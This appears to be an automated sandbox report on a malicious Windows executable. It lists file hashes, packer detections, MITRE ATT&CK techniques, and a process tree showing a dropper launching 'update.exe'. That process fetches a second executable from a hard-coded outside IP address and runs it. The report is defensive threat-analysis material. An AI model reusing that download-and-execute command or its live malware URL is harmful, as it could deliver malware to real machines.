e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df

General

Target

e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
Size

8.5MB
MD5

4c046d8fcd68b308e6361c49579d3dd4
SHA1

e595aa98843684e494a3edb9a58d86508f1d81a3
SHA256

e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df
SHA512

c4c60b60e387407c0626931b07c608f44fddd6411b9a578f9ba13b26321972db323e26b5c36846ab854ac75c892325f157aa073a8bf00514a2d937e36a5da504
SSDEEP

196608:M7xiyjnEtXw/K7W0yVLrS4riDVmv7H0X7FEk:Ajn2g/KktrHWVmv7H0XREk

Score

8^/10

upx

Malware Config

Signatures

Downloads MZ/PE file

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x00060000000230bd-14.dat	acprotect
behavioral2/files/0x00060000000230bd-17.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe

Executes dropped EXE 2 IoCs

pid	Process
4480	update.exe
4232	JDÉÏ´«1.7.exe

Loads dropped DLL 1 IoCs

pid	Process
4480	update.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00060000000230bd-14.dat	upx
behavioral2/memory/4480-16-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/files/0x00060000000230bd-17.dat	upx
behavioral2/memory/4480-20-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4480-19-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4480-22-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4480-21-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-37-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-40-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-41-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-42-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-43-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-51-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-49-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-47-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-45-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-53-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-55-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-57-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-65-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-63-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-61-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-67-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-59-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-69-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-73-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-75-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-71-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-83-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-81-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-79-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-77-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/4232-84-0x0000000010000000-0x000000001003E000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4480	update.exe
4480	update.exe
4480	update.exe
4480	update.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2364	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
2364	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
4480	update.exe
4480	update.exe
4480	update.exe
4232	JDÉÏ´«1.7.exe
4232	JDÉÏ´«1.7.exe
4232	JDÉÏ´«1.7.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 4480	2364	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe	97
PID 2364 wrote to memory of 4480	2364	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe	97
PID 2364 wrote to memory of 4480	2364	e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe	97
PID 4480 wrote to memory of 4232	4480	update.exe	101
PID 4480 wrote to memory of 4232	4480	update.exe	101
PID 4480 wrote to memory of 4232	4480	update.exe	101

C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
"C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Users\Admin\AppData\Local\Temp\update.exe
  "C:\Users\Admin\AppData\Local\Temp\update.exe" http://150.158.135.5:8881/JD.exe C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe C:\Users\Admin\AppData\Local\Temp\e1a873d75a3d97d7d1570252eb9460dd7419dfa9eb9100807e083ebff02bf6df.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe
    C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe

Filesize
8.5MB

MD5
d298c261325c71832c727eccbc6a26d3

SHA1
b4d1be68ae8ec0e38423b6654e658b396fd9d318

SHA256
f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a

SHA512
9773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\JDÉÏ´«1.7.exe

Filesize
8.5MB

MD5
d298c261325c71832c727eccbc6a26d3

SHA1
b4d1be68ae8ec0e38423b6654e658b396fd9d318

SHA256
f642448a8b22017caa6808f83fddb9d1b4e6fea3ce85eb2201788895d0be349a

SHA512
9773e4d6657d890faa192418d0f25e5c740e8e0a6572f5f3b2a70e800740a348e65dc9fe2e7f383745d4ca889e56613e4ac155b020d94e93d077466ac2c7b4aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skin.dll

Filesize
86KB

MD5
114054313070472cd1a6d7d28f7c5002

SHA1
9a044986e6101df1a126035da7326a50c3fe9a23

SHA256
e15d9e1b772fed3db19e67b8d54533d1a2d46a37f8b12702a5892c6b886e9db1

SHA512
a2ff8481e89698dae4a1c83404105093472e384d7a3debbd7014e010543e08efc8ebb3f67c8a4ce09029e6b2a8fb7779bb402aae7c9987e61389cd8a72c73522

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skin.dll

Filesize
86KB

MD5
114054313070472cd1a6d7d28f7c5002

SHA1
9a044986e6101df1a126035da7326a50c3fe9a23

SHA256
e15d9e1b772fed3db19e67b8d54533d1a2d46a37f8b12702a5892c6b886e9db1

SHA512
a2ff8481e89698dae4a1c83404105093472e384d7a3debbd7014e010543e08efc8ebb3f67c8a4ce09029e6b2a8fb7779bb402aae7c9987e61389cd8a72c73522

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.exe

Filesize
1.1MB

MD5
7fe065878aa934225097edc54afd4b58

SHA1
bbdcb2041fd7f2bc5c38c6012623c120f3a55210

SHA256
b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088

SHA512
c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.exe

Filesize
1.1MB

MD5
7fe065878aa934225097edc54afd4b58

SHA1
bbdcb2041fd7f2bc5c38c6012623c120f3a55210

SHA256
b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088

SHA512
c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109

Download Submit
C:\Users\Admin\AppData\Local\Temp\update.exe

Filesize
1.1MB

MD5
7fe065878aa934225097edc54afd4b58

SHA1
bbdcb2041fd7f2bc5c38c6012623c120f3a55210

SHA256
b251ca86d4180d0b36cfff2c94c8b7ed860badc3a0617a6b02faa14a25f61088

SHA512
c78f7286fc451f21641a1b3198eb0d187591ac7453c1a1f74e387cd64326f7190a5edb2b488b56d75992bd9155df365c59fb756d9e73e13351a6c9a980fca109

Download Submit
memory/4232-67-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-55-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-84-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-77-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-79-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-37-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-40-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-41-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-42-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-43-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-51-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-49-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-47-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-45-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-53-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-81-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-57-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-65-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-63-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-61-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-83-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-59-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-69-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-73-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-75-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4232-71-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4480-16-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4480-22-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4480-20-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4480-19-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4480-21-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download

Analysis

Sharing